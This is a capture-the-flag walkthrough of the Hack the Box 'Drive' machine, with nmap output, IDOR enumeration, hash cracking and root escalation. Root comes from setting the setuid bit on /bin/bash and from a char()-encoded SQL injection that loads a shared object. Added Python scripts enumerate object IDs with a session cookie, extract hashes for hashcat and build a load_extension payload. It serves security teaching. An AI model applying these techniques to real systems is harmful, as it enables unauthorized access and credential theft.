In this post, I would like to share a walkthrough of the Drive machine from Hack the Box.
This machine is rated Hard on Hack the Box.
What will you gain from the Drive machine?
For the user flag, you will need to exploit an IDOR vulnerability that gives unauthorized access to the administrator's files and reveals credentials that grant SSH access. With that access, I'll reach a Gitea instance and use the extracted credentials to get at a backup script and the passwords used for the site backups. Inside those backups are hashes for additional users, which I'll crack to obtain their passwords.
As for the root flag, you need to exploit a command-line client binary that is vulnerable to a buffer overflow. I will demonstrate this vulnerability, along with two methods of achieving code execution (RCE) through an unintended SQL injection.
For those who want to learn or improve their cybersecurity skills, especially red teaming and blue teaming, you can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me.
The Academy link can be found at https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259
Information Gathering on Drive Machine
Once we have started the VPN connection (the configuration file is downloaded from Hack the Box), we can start gathering information on the machine by executing nmap -sC -sV -p- -Pn <IP Address>. The scan below was run against nmap's default top 1000 ports and saved with -oA initial; a full -p- scan is worth running afterwards to catch anything outside that range.
┌─[darknite@parrot]─[~/Documents/htb/drive]
└──╼ $nmap -sC -sV 10.10.11.235 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-16 05:48 EST
Nmap scan report for 10.10.11.235
Host is up (0.020s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 275a9fdb91c316e57da60d6dcb6bbd4a (RSA)
|   256 9d076bc847280df29f81f2b8c3a67853 (ECDSA)
|_  256 1d30349f797369bdf667f3343c1ff94e (ED25519)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://drive.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
┌─[darknite@parrot]─[~/Documents/htb/drive]
└──╼ $
Nmap reports a redirect to http://drive.htb/, so we add that hostname to /etc/hosts and then access the website.
Nothing interesting is found on the main page except the login and register buttons.
We also did not find any useful information in the main-page requests captured with Burp Suite.
As a result, let's register a new account so that we can investigate further.
We successfully reach the dashboard after logging in with the credentials we just created.
The request and response in Burp Suite look like the screenshot above.
The interface shown above appears when we click the dashboard button on the main page.
On this page we can play with functions such as “Change Properties”, “Delete”, “Edit Content” and “Just View”.
Clicking the “Just View” function gives the view shown above.
IDOR vulnerability on the Drive machine
We should inspect the request in Burp Suite when we click one of the files on the dashboard page; the file is selected by a numeric ID.
Enumerate using the wfuzz tool
Running the command shown above returns a handful of hits: IDs “79”, “98”, “99”, “101” and “100”. (Hide the 404 responses, for example with --hc 404, so that only IDs which actually resolve are listed.)
Enumerate using Burp Suite Intruder
Intruder can brute-force the same ID parameter to reach files that belong to other accounts.
Let's open the first ID from the Intruder output, “79”. Surprisingly, it contains potential usernames and passwords for the server.
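The following Python script is an added example, not code from the original walkthrough: it performs the same ID enumeration as wfuzz or Intruder, but with the classification written out, so the IDOR hit is defined precisely as "a 200 response for an object ID that is not one of ours". The hostname comes from the nmap redirect; the path template, the cookie value and the sample responses are assumptions and constructed stand-ins, not the real application's route or data.

```python
"""Enumerate numeric object IDs with our own session and flag foreign objects
that are readable (IDOR). Added example; route and sample data are assumed."""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

BASE_URL = "http://drive.htb"        # hostname from the nmap redirect
PATH_TEMPLATE = "/files/{id}/"       # assumption: replace with the path seen in Burp

Fetcher = Callable[[str], Tuple[int, str]]


def make_http_fetcher(cookie: str, timeout: float = 5.0) -> Fetcher:
    """Return fetch(url) -> (status, body) that replays our session cookie."""
    def fetch(url: str) -> Tuple[int, str]:
        req = urllib.request.Request(url, headers={"Cookie": cookie})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            # 401/403/404 are results we want to classify, not failures
            return err.code, err.read().decode("utf-8", "replace")
    return fetch


def find_idor(ids: Iterable[int], fetch: Fetcher,
              own_ids: Iterable[int]) -> Dict[str, List[int]]:
    """Classify every ID as own / idor / denied / missing based on the status code."""
    own = set(own_ids)
    result: Dict[str, List[int]] = {"own": [], "idor": [], "denied": [], "missing": []}
    for oid in ids:
        status, _body = fetch(BASE_URL + PATH_TEMPLATE.format(id=oid))
        if status == 200:
            # readable with our session although it is not our object -> IDOR
            result["own" if oid in own else "idor"].append(oid)
        elif status in (401, 403):
            result["denied"].append(oid)
        else:
            result["missing"].append(oid)
    return result


# Constructed offline stand-in for the server: five IDs resolve, one of them
# (100) is our own upload, ID 80 is explicitly forbidden, everything else is 404.
SAMPLE_RESPONSES = {
    79: (200, "admin notes"), 98: (200, "file"), 99: (200, "file"),
    100: (200, "our own file"), 101: (200, "file"), 80: (403, "forbidden"),
}


def sample_fetch(url: str) -> Tuple[int, str]:
    """Fetcher that answers from SAMPLE_RESPONSES instead of the network."""
    oid = int(url.rstrip("/").rsplit("/", 1)[-1])
    return SAMPLE_RESPONSES.get(oid, (404, "not found"))


if __name__ == "__main__":
    # For the real target: fetch = make_http_fetcher("<your session cookie>")
    hits = find_idor(range(70, 110), sample_fetch, own_ids=[100])
    print("foreign objects readable with our session:", hits["idor"])
```

Against the real target, swap sample_fetch for make_http_fetcher() with the cookie copied from Burp; the idor list is what wfuzz shows once 404s are hidden, minus the IDs that are legitimately ours.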
The credentials we found cannot be used on the website login page.
They do, however, work for the SSH service, and we get a shell on the machine with them.
The home directory only contains a snap directory, and there is nothing stored in it.
Investigate the SQLite Database
We found a few files that belong to an SQLite database, so let's download db.sqlite3 to our machine.
The .dump command prints a lot of SQL statements.
Let's look at what is stored in the table columns.
We find a few pieces of information, including password hashes.
Cracking the hashes with hashcat gives us some credentials.
After trying a few of them, we successfully access the machine as tom via SSH.
We can read the user flag with the “cat user.txt” command.
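Here is an added Python example (not from the original walkthrough) of the database investigation done programmatically rather than by reading a .dump by eye: it lists the tables, walks every row, picks out cells that look like password hashes, labels each with its hashcat mode, and writes user:hash lines ready for hashcat --username. The in-memory database it builds is a constructed stand-in for db.sqlite3; its table names and hash values are made up and the digests are not real.

```python
"""Pull password hashes out of an SQLite database and label their hashcat mode.
Added example; the sample database is constructed, not the machine's."""
import sqlite3
from typing import Dict, List, Optional, Tuple

# Prefix -> (format, hashcat -m). Only these formats are recognized here.
HASH_PREFIXES: Dict[str, Tuple[str, int]] = {
    "pbkdf2_sha256$": ("Django PBKDF2-SHA256", 10000),
    "sha1$": ("Django salted SHA-1", 124),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$6$": ("sha512crypt", 1800),
    "$5$": ("sha256crypt", 7400),
    "$1$": ("md5crypt", 500),
}
USER_COLUMNS = ("username", "user", "email", "login")


def guess_hash_mode(value: str) -> Optional[Tuple[str, int]]:
    """Return (format name, hashcat mode) for a recognized hash prefix, else None."""
    for prefix, info in HASH_PREFIXES.items():
        if value.startswith(prefix):
            return info
    return None


def _quote_ident(name: str) -> str:
    return '"' + name.replace('"', '""') + '"'


def list_tables(conn: sqlite3.Connection) -> List[str]:
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")
    return [r[0] for r in rows]


def table_columns(conn: sqlite3.Connection, table: str) -> List[str]:
    return [r[1] for r in conn.execute(f"PRAGMA table_info({_quote_ident(table)})")]


def extract_hashes(conn: sqlite3.Connection) -> List[Tuple[str, str, str]]:
    """Return (table, account, hash) for every text cell with a known hash prefix."""
    found = []
    for table in list_tables(conn):
        cols = table_columns(conn, table)
        for row in conn.execute(f"SELECT * FROM {_quote_ident(table)}"):
            cells = list(zip(cols, row))
            for _col, val in cells:
                if isinstance(val, str) and guess_hash_mode(val):
                    # prefer a sibling column that names the account; fall back to column 1
                    account = next((str(v) for c, v in cells if c.lower() in USER_COLUMNS),
                                   str(row[0]))
                    found.append((table, account, val))
    return found


def hashcat_lines(hashes: List[Tuple[str, str, str]]) -> List[str]:
    """user:hash lines, to be cracked with: hashcat -m <mode> --username hashes.txt wordlist"""
    return [f"{account}:{h}" for _table, account, h in hashes]


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for db.sqlite3 (fake hashes, fake users)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_staff INTEGER);
        CREATE TABLE files (id INTEGER PRIMARY KEY, owner_id INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'admin', 'sha1$constructedsalt$0123456789abcdef0123456789abcdef01234567', 1);
        INSERT INTO users VALUES (2, 'tom', 'pbkdf2_sha256$260000$constructedsalt$Y29uc3RydWN0ZWRkaWdlc3Q=', 0);
        INSERT INTO files VALUES (79, 1, 'notes.txt');
    """)
    return conn


if __name__ == "__main__":
    db = build_sample_db()          # real use: sqlite3.connect("db.sqlite3")
    for table, account, h in extract_hashes(db):
        fmt = guess_hash_mode(h)
        print(f"{table}.{account}: {fmt[0]} (hashcat -m {fmt[1]})")
    print("\n".join(hashcat_lines(extract_hashes(db))))
```

Knowing the mode up front matters: hashcat will refuse or silently misparse a hash fed with the wrong -m, and the prefix table above is the quickest sanity check before a long cracking run.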
Escalate to Root Privileges Access
While reading the user flag, I noticed a binary called “doodleGrive-cli” in the home directory (check its owner and permission bits with ls -l; a root-owned setuid binary is what makes a file like this worth a closer look).
Therefore, let's download the binary to our machine.
Analyzing it in Ghidra reveals a hard-coded username and password for the binary's login prompt.
The same username and password can also be found with the “strings” command.
Next, we create a file named exploit that contains the command which changes the permissions of /bin/bash.
Then we run the binary, enter the username and password, and choose option 5, which activates a user account.
Afterwards /bin/bash carries the setuid bit, which we can use to escalate to root (run bash -p so that it keeps the effective UID).
We can read the root flag with the “cat root.txt” command.
Another method to obtain root access
The source code used for this method is shown in the screenshot above.
We need to rename dark.so to 0.so and make it executable. Once that is done, we run the doodleGrive-cli binary.
Now we can enter a payload that uses the char() function to load the shared object through the binary's SQL query.
After a while, /bin/bash is setuid as well.
We can read the root flag with the “cat root.txt” command.
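To make the mechanism behind both root methods concrete, here is an added Python example that is not part of the original walkthrough. The actual query inside doodleGrive-cli is not shown on this page, so the "activate user account" function below is a hypothetical stand-in built the vulnerable way (string concatenation) next to its parameterised fix. The example shows two things: that a username value can break out of the quotes and change what the UPDATE does, and that SQLite's char() rebuilds an arbitrary string such as a library path from plain digits, which is why the 0.so payload can be typed without the path's own characters. The page does not name the SQLite function used to load the library; load_extension() is assumed here, and because it is disabled by default (in SQLite itself and in Python's sqlite3 module) the payload is only built, never executed.

```python
"""SQLite injection and the char() encoding trick. Added example; the
vulnerable query is hypothetical and the users table is constructed."""
import sqlite3


def sqlite_char_literal(text: str) -> str:
    """Encode text as a SQLite char(...) expression: '/tmp/0.so' -> 'char(47,116,...)'."""
    return "char(" + ",".join(str(ord(c)) for c in text) + ")"


def sqlite_evaluates_to(expr: str) -> str:
    """Ask SQLite what an expression yields, proving the char() encoding round-trips."""
    with sqlite3.connect(":memory:") as conn:
        return conn.execute("SELECT " + expr).fetchone()[0]


def build_sample_db() -> sqlite3.Connection:
    """Constructed users table standing in for the CLI's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, active INTEGER);
        INSERT INTO users VALUES ('admin', 0), ('tom', 0), ('alice', 0);
    """)
    return conn


def activate_user_vulnerable(conn: sqlite3.Connection, username: str) -> int:
    """Hypothetical 'activate user account' option that concatenates the input.
    Returns the number of rows the UPDATE touched."""
    cur = conn.execute(f"UPDATE users SET active = 1 WHERE username = '{username}'")
    return cur.rowcount


def activate_user_fixed(conn: sqlite3.Connection, username: str) -> int:
    """Same operation with a bound parameter: the input can never become SQL."""
    cur = conn.execute("UPDATE users SET active = 1 WHERE username = ?", (username,))
    return cur.rowcount


def load_extension_payload(library_path: str) -> str:
    """Username value that, inside the vulnerable query, would call load_extension()
    on a path spelled with char(). Assumption: the target had load_extension enabled.
    Built for illustration only; not executed here."""
    return f"' OR load_extension({sqlite_char_literal(library_path)}) -- "


if __name__ == "__main__":
    path_expr = sqlite_char_literal("/tmp/0.so")
    print(path_expr, "->", sqlite_evaluates_to(path_expr))
    print("vulnerable rows updated:", activate_user_vulnerable(build_sample_db(), "' OR 1=1 -- "))
    print("fixed rows updated:     ", activate_user_fixed(build_sample_db(), "' OR 1=1 -- "))
    print("payload:", load_extension_payload("/tmp/0.so"))
```

The fix is the usual one: the binary should bind the username as a parameter instead of pasting it into the statement, and a setuid program should never open its database with extension loading enabled.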